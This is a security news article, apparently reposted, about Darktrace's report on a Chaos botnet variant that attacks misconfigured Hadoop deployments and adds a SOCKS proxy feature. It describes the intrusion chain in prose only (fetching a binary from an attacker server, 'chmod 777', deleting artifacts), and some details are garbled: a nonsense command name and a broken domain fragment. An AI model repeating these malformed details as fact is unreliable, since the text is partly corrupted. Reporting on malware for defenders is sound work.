Cybersecurity researchers have warned of a new variant of malware called “Chaos” that can attack misconfigured cloud deployments, marking the expansion of infrastructure targeted by botnets.
“Chaos malware is increasingly targeting misconfigured cloud deployments, expanding beyond its traditional focus on routers and edge devices,” Darktrace said in a new report.
Chaos was first documented by Lumen Black Lotus Labs in September 2022 and is described as cross-platform malware that targets Windows and Linux environments and can execute remote shell commands, drop additional modules, propagate to other hosts via brute force SSH keys, mine cryptocurrencies, and launch distributed denial of service (DDoS) attacks over HTTP, TLS, TCP, UDP, and WebSockets.
This malware is believed to be an evolution of another DDoS malware known as Kaiji that identified misconfigured Docker instances. At this time, it is unclear who is behind this operation, but the presence of Chinese characters and the use of China-based infrastructure suggest that the threat actor may be of Chinese origin.
Darktrace said it identified a new variant last month that targets honeypot networks, intentionally misconfigured Hadoop instances that allow remote code execution on the service. The attack, discovered by a cybersecurity firm, began with an HTTP request to a Hadoop deployment to create a new application.
On the application side, a series of shell commands (‘pan.tenire’) were embedded to retrieve the Chaos agent binary from an attacker-controlled server.[.]com”), set permissions to read, modify, or execute for all users (“chmod 777”), and actually run the binary to remove artifacts from disk, minimizing the forensic trail.
An interesting aspect of this attack is that this domain has previously been used in connection with an email phishing campaign run by the Chinese cybercrime group Silver Fox to deliver decoy documents and ValleyRAT malware. The campaign was codenamed “Operation Silk Lure” by Seqrite Labs in October 2025.
The 64-bit ELF binary is a rebuilt and updated version of Chaos, keeping most of the core feature set intact while rebuilding some features. However, one of the more significant changes concerns the removal of functionality that allows for spread via SSH and exploitation of router vulnerabilities.
Its replacement is a new SOCKS proxy feature that allows compromised systems to be used to convey traffic. This hides the true cause of malicious activity and makes it difficult for defenders to detect and block attacks.
“Furthermore, several features previously thought to be inherited from Kaiji have also changed, suggesting that the attackers have rewritten or extensively refactored the malware,” Darktrace added.
The addition of proxy functionality is likely a sign that the attackers behind the malware are looking to further monetize their botnets beyond crypto mining and rental DDoS, offering a variety of illicit services to compete with competitors in the cybercrime market.
“While Chaos is not new malware, its continued evolution highlights cybercriminals’ dedication to expanding their botnets and enhancing the capabilities at their disposal,” Darktrace concluded. “Recent changes in botnets such as AISURU and Chaos to include proxy services as a core functionality demonstrate that denial of service is no longer the only risk these botnets pose to organizations and their security teams.”
Source link
